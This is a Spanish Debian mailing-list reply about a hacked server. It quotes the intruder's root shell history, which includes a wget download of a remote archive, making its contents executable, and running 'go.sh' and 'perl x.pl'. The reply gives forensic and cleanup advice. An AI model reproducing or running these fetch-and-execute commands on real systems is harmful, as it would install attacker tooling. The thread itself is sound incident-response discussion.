El día 13 de mayo de 2011 08:39, ciracusa <cirac...@gmail.com> escribió: > Lista, buenas tardes. > > Perdón si este tema no esta directamente relacionado con Debian, pero como > el server en cuestión tiene Squeeze y es un tema de seguridad creo que puede > interesarles a mas de uno. > > Ayer viendo el history de root de un servidor veo lo siguiente: > > 314 ./go.sh 189 > 315 w > 316 cd > 317 cd /var/tmp/ > 318 rm -rf gosh > 319 ls -a > 320 exit > 321 cat /proc/cpuinfo > 322 passwd > 323 cd /var/tmp/ > 324 cd gosh > 325 touch bios.txt > 326 chmod +x * > 327 screen > 328 exit > 329 cat /proc/cpuinfo > 330 cd /var/tmp/ > 331 ls -a > 332 wget http://gblteam.webs.com/gosh.tgz.tar > 333 tar zxvf gosh.tgz.tar > 334 rm -rf gosh.tgz.tar > 335 cd gosh > 336 touch bios.txt > 337 chmod +x * > 338 ./go.sh 200 > 339 cd > 340 cd /var/tmp/ > 341 ls -a > 342 rm -rf gosh > 343 ls -a > 344 exit > 345 cd /var/tmp/ > 346 perl x.pl > > > Que opinan?
Yo, haria una imagen para analisis forense! Luego, que servicios tenes? Si es apache y tenes php; busca en el log de apache y alli encontraras la respuesta de como entraron. Luego, # last y veras si llego a root. Si usas ssh con contrasena, podrias probar a loguearte en terminal remota y sin meter la contrasena; trata de entrar por sftp; la posibilidad es de aprox. 1/25. Chequea las ultimas vulnerabilidades en http://www.exploit-db.com Si usas tripwire y tenes la base en remoto; comparala con la del servidor, para descubrir el culpable. Pasale chkrootkit y chkhunterdesde una live, para saber que bichos tenes. Y por ultimo, nada de lo que tengas alli, es confiable; asi como los backups, hasta que descubras el momento exacto de la intrusion. hasta pronto. PD: El uso de paquetes de terceros, es uno de los mayores riesgos; asi como a mas capas de software, mayor riesgo. . > > Entiendo -lamentablemente- que el server fue comprometido, pero lo que no > llego a comprender es el alcance de esto. > > Notar que puse el link para que puedan descargarlo uds. también y analizarlo > (tomando las precauciones del caso). > > Bueno, si alguien tiene algo de info muy agradecido. > > Y si pueden recomendarme algunos pasos para analizar la seguridad del server > desde ya muchas gracias. > > Salu2. > > > -- > To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org > with a subject of "unsubscribe". Trouble? Contact > listmas...@lists.debian.org > Archive: http://lists.debian.org/4dcd50cc.3030...@gmail.com > > -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTimL5pEAV7_L{cetkezqyrt6f...@mail.gmail.com